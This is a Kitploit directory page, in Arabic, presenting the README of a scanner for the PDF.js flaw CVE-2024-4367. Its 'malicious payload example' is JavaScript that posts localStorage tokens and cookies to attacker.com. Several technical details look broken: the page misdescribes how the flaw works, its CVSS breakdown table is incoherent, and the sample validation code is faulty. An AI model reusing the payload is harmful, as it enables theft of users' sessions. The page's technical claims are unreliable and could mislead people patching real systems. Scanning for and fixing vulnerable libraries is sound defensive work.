Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pdf.js-CVE-2024-4367 — مسح PoC النهائي لـ CVE-2024-4367 | Kitploit
أدوات/GitHubGitHub/veronimo669/pdf.js-cve-2024-4367
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubveronimo669/pdf.js-cve-2024-4367

pdf.js-CVE-2024-4367

مسح PoC النهائي لـ CVE-2024-4367

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2024-4367 - ماسح ثغرات PDF.js الشامل

⚠️ أداة أمنية حرجة | يكتشف CVE-2024-4367 (CVSS 9.8) - ثغرة تنفيذ الأكواد عن بُعد في PDF.js

Version CVSS CVE License

يعمل على أي موقع ويب - بدون أي إعداد مطلوب


📋 جدول المحتويات

  • 📖 نظرة عامة
  • ⚡ بدء سريع
  • 🔍 ما الذي يكتشفه
  • 🛠️ كيف يعمل
  • 📊 أمثلة على المخرجات
  • 🔒 دليل المعالجة
  • 🎯 نواقل الاستغلال
  • 🧪 تعليمات الاختبار
  • 📝 التفاصيل التقنية
  • ⚠️ إخلاء المسؤولية القانوني
  • 📚 المراجع

📖 نظرة عامة

CVE-2024-4367 هي ثغرة حرجة في PDF.js (الإصدارات < 4.2.67) تسمح بـتنفيذ JavaScript عشوائي عبر ملفات PDF خبيثة. يقوم هذا الماسح بالتعرف تلقائيًا على حالات PDF.js المعرّضة للخطر على أي موقع ويب.

لماذا هذا الماسح مختلف

  • ✅ بدون أي إعداد - يعمل على أي موقع فورًا
  • ✅ كشف شامل - يفحص جميع حزم JavaScript
  • ✅ بدون تبعيات - JavaScript خالص
  • ✅ إثبات المفهوم - يولّد ملف PDF للاختبار
  • ✅ نتائج قابلة للتنفيذ - خطوات معالجة واضحة

الثغرة

يحتوي PDF.js على خلل حيث يتم تنفيذ JavaScript المضمّنة في ملفات PDF دون عزل مناسب (sandboxing)، مما يسمح للمهاجمين بـ:

  • 🏴‍☠️ سرقة رموز المصادقة من localStorage/sessionStorage
  • 🍪 سرقة ملفات تعريف الارتباط (الكوكيز) الخاصة بالجلسات
  • 📁 الوصول إلى الملفات المحلية (إذا كان تطبيق Electron/سطح مكتب)
  • 🔐 تنفيذ إجراءات بصفة الضحية باستخدام بيانات الاعتماد المسروقة
  • 🌐 التنقل إلى الشبكات الداخلية عبر XSS

⚡ بدء سريع

الطريقة 1: وحدة تحكم المتصفح (الأسهل)

  1. افتح الموقع المستهدف
  2. اضغط F12 لفتح أدوات المطور (DevTools)
  3. انتقل إلى تبويب Console
  4. الصق نص الماسح بالكامل
  5. اضغط Enter
  6. شاهد النتائج المرئية على الشاشة!

الطريقة 2: العلامة المرجعية البرمجية (Bookmarklet)

أنشئ إشارة مرجعية بهذا الرابط:

root@kitploit:~
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();

الطريقة 3: التنزيل المباشر

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Open any website and run the script

🔍 ما الذي يكتشفه

المرحلة 1: فحص حزم JavaScript

  • ✅ اكتشاف إصدار PDF.js
  • ✅ تحديد الإصدارات المعرّضة للخطر (< 4.2.67)
  • ✅ مراجع Package.json
  • ✅ مسارات Node_modules

المرحلة 2: تحديد عارضات PDF

  • ✅ عارضات PDF عبر ``
  • ✅ عناصر <embed>
  • ✅ وسوم بيانات <object>
  • ✅ حاويات عارض PDF المخصصة
  • ✅ محركات العرض المبنية على Canvas

المرحلة 3: نواقل الاستغلال

  • ✅ معاملات الرابط (?pdf=, ?file=, ?src=)
  • ✅ نماذج رفع PDF
  • ✅ حقول إدخال الملفات التي تقبل .pdf
  • ✅ نقاط نهاية API تحتوي مسارات PDF

المرحلة 4: المؤشرات المرئية

  • ✅ حالة الثغرة في الوقت الفعلي
  • ✅ ملف PDF قابل للتنزيل لإثبات المفهوم
  • ✅ تراكب DOM في الوقت الفعلي

🛠️ كيف يعمل

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                    SCAN PROCESS FLOW                        │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 📚 LOAD SCRIPTS                                         │
│     ├─ External scripts (all <script src="">)              │
│     └─ Inline scripts (all <script> tags)                  │
│                                                             │
│  2. 🔍 EXTRACT PDF.JS VERSION                               │
│     ├─ Pattern matching in code                             │
│     ├─ Package.json detection                               │
│     └─ Node_modules path parsing                            │
│                                                             │
│  3. 🎯 IDENTIFY VULNERABILITY                               │
│     ├─ version < 4.2.67 ? → VULNERABLE                     │
│     └─ version = 2.16.105 ? → VULNERABLE                   │
│                                                             │
│  4. 🖼️ LOCATE VIEWERS                                       │
│     ├─ DOM element scanning                                 │
│     └─ Attribute detection                                 │
│                                                             │
│  5. ⚡ GENERATE POC                                         │
│     ├─ Create test PDF                                      │
│     └─ Provide download link                                │
│                                                             │
│  6. 📊 DISPLAY RESULTS                                      │
│     ├─ Visual overlay                                       │
│     ├─ Console report                                       │
│     └─ Global variable storage                              │
│                                                             │
└─────────────────────────────────────────────────────────────┘

📊 أمثلة على المخرجات

مخرجات وحدة التحكم

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CVE-2024-4367 - UNIVERSAL PDF.js SCANNER                         ║
║              Detects vulnerable PDF.js versions and potential exploitation         ║
╚═══════════════════════════════════════════════════════════════════════════════════╝

📚 PHASE 1: Scanning JavaScript Bundles for PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] Found 42 external scripts
[+] Found 12 inline scripts
   [1/42] Analyzing: vendor.bundle.js
      → PDF.js indicator found: pdfjs-dist
      ✅ PDF.js version found: 2.16.105
      🚨 VULNERABLE to CVE-2024-4367!

🎯 PHASE 4: Identifying Exploitation Vectors
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⚠️ URL parameter accepts PDF: file=/documents/report.pdf
   ⚠️ PDF upload form found

█████████████████████████████████████████████████████████████████████████████████
                          FINAL SCAN REPORT
█████████████████████████████████████████████████████████████████████████████████

🚨 CRITICAL VULNERABILITY CONFIRMED!
   CVE: CVE-2024-4367
   CVSS: 9.8 (CRITICAL)
   Impact: Arbitrary JavaScript Execution

التراكب المرئي

Scanner Overlay

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  CVE-2024-4367 SCAN RESULTS                                │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  📍 Target: example.com                                    │
│  📦 PDF.js: 2.16.105                                       │
│  🎯 Vulnerable: YES                                        │
│  📄 Viewers: 3                                             │
│  ⚡ Vectors: 2                                             │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  🔴 CRITICAL - Upgrade Required                            │
└─────────────────────────────────────────────────────────────┘

🔒 دليل المعالجة

إجراءات فورية

1. ترقية PDF.js (موصى به)

root@kitploit:~
# For Node.js projects
npm install pdfjs-dist@latest

# For CDN usage
# Update to version 4.2.67 or higher

2. تعطيل تنفيذ JavaScript

root@kitploit:~
// Set this before loading PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;

3. سياسة أمان المحتوى (CSP)

root@kitploit:~
Content-Security-Policy: script-src 'self'; 
                        object-src 'none'; 
                        worker-src 'none'

4. التحقق من المدخلات

root@kitploit:~
// Validate PDF files before rendering
function validatePDF(file) {
    // Check magic bytes
    const header = file.slice(0, 5);
    if (header !== '%PDF-') {
        throw new Error('Invalid PDF file');
    }
    
    // Scan for JavaScript
    const text = file.toString();
    if (text.includes('/JavaScript') || 
        text.includes('/JS') ||
        text.includes('<< /S /JavaScript >>')) {
        throw new Error('PDF contains JavaScript');
    }
}

حلول طويلة الأمد


🎯 نواقل الاستغلال

النواقل الشائعة المكتشفة

  1. معاملات الرابط

    root@kitploit:~
    /viewer?file=malicious.pdf
    /download?pdf=malicious.pdf
    
  2. رفع الملفات

    root@kitploit:~
    <input type="file" accept=".pdf">
    
  3. العارضات المضمّنة

    root@kitploit:~
    
    <embed src="malicious.pdf">
    
  4. نقاط نهاية API

    root@kitploit:~
    /api/documents/123/download
    /api/report/pdf
    

مثال على حمولة خبيثة

root@kitploit:~
// PDF embedded JavaScript
this.alert('CVE-2024-4367 Exploited!');
fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        token: localStorage.getItem('token'),
        cookies: document.cookie
    })
});

🧪 تعليمات الاختبار

اختبار خطوة بخطوة

  1. تثبيت الماسح

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-4367-Scanner
    
  2. تشغيل الماسح

    root@kitploit:~
    # Open the target website
    # Paste the scanner in console
    # Or use the bookmarklet
    
  3. تحليل النتائج

    • ابحث عن حالة "VULNERABLE" (معرّضة للخطر)
    • سجّل إصدار PDF.js
    • تحقق من نواقل الاستغلال
  4. تنزيل ملف PDF لإثبات المفهوم (إذا كان معرّضًا للخطر)

    • انقر زر التنزيل
    • ارفع/افتح ملف PDF
    • لاحظ تنفيذ JavaScript
  5. تطبيق الإصلاحات

    • ترقية PDF.js
    • تطبيق CSP
    • التحقق من المدخلات

النتائج المتوقعة

السيناريوالنتيجة
PDF.js 2.16.105🔴 حرجة
PDF.js 3.x🔴 معرّضة للخطر
PDF.js 4.0.x🔴 معرّضة للخطر
PDF.js 4.2.67+

📝 التفاصيل التقنية

التحقق من الإصدار

root@kitploit:~
// Vulnerable versions
const VULNERABLE_VERSIONS = [
    { version: '2.16.105', status: 'CRITICAL' },
    { version: '3.x.x', status: 'CRITICAL' },
    { version: '4.0.x - 4.2.66', status: 'CRITICAL' }
];

// Safe version
const SAFE_VERSION = '4.2.67';

الجدول الزمني للثغرة

التاريخالحدث
2024-04-23اكتشاف الثغرة
2024-04-24تخصيص CVE-2024-4367
2024-04-25إصدار التصحيح (4.2.67)

تفصيل درجة CVSS


⚠️ إخلاء المسؤولية القانوني

هام: هذه الأداة مخصصة للاختبارات الأمنية المصرّح بها وللأغراض التعليمية فقط.

  • ✅ افعل: استخدمها على مواقعك الخاصة
  • ✅ افعل: استخدمها بإذن صريح
  • ✅ افعل: استخدمها لأغراض البحث الأمني
  • ❌ لا تفعل: استخدمها على أنظمة غير مصرّح بها
  • ❌ لا تفعل: استخدمها لأغراض خبيثة

المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


📚 المراجع

موارد رسمية

  • CVE-2024-4367 - NIST NVD
  • استشارة أمنية لـ PDF.js
  • مدونة Mozilla الأمنية

ثغرات ذات صلة

  • CVE-2024-4367 - PDF.js RCE
  • CVE-2023-xxxx - مشكلات سابقة في PDF.js
  • XSS عبر PDF.js في تطبيقات الويب

أدوات وموارد

  • المستودع الرسمي لـ PDF.js
  • الوقاية من XSS وفق OWASP
  • مرجع CSP

أوراق بحثية

  • التحليل الأمني لـ PDF.js
  • مخاطر عرض PDF من جانب العميل

🤝 المساهمة

المساهمات مرحّب بها! يرجى:

  1. إنشاء نسخة (Fork) من المستودع
  2. إنشاء فرع ميزة جديد
  3. تقديم طلب سحب (Pull Request)
  4. الالتزام بنمط الكود

إعداد بيئة التطوير

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Make your changes
# Test on multiple websites
# Submit PR

📄 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.


🌟 الدعم

إذا وجدت هذه الأداة مفيدة:

  • ⭐ أضف نجمة للمستودع
  • 🐛 أبلغ عن المشكلات
  • 📝 اكتب التوثيق
  • 🔧 قدّم الإصلاحات

🛡️ ابقَ آمنًا. اختبر مبكرًا. اختبر باستمرار.

صُنع بكل ❤️ من مجتمع الأمن السيبراني

الإبلاغ عن مشكلة • أضف نجمة على GitHub • اقرأ التوثيق

تنزيل الأداة
الحلالصعوبةالفعالية
ترقية PDF.jsسهلة✅ إصلاح كامل
تعطيل JavaScript في PDF.jsسهلة✅ إصلاح كامل
تطبيق CSPمتوسطة✅ جيدة
التحقق من جهة الخادممتوسطة✅ جيدة
العرض في بيئة معزولة (Sandbox)صعبة✅ ممتازة
✅ آمنة
لا يوجد PDF.jsℹ️ آمنة
2024-04-26
الكشف العام
2024-05-01ملاحظة محاولات استغلال
المكوّنالدرجة
ناقل الهجومشبكة (9.8)
تعقيد الهجوممنخفض (9.8)
الامتيازات المطلوبةلا شيء (9.8)
تفاعل المستخدممطلوب (8.8)
النطاقمتغير (9.1)
السريةعالية (9.8)
السلامةعالية (9.8)
التوافرعالي (9.8)
الإجمالي9.8 (حرجة)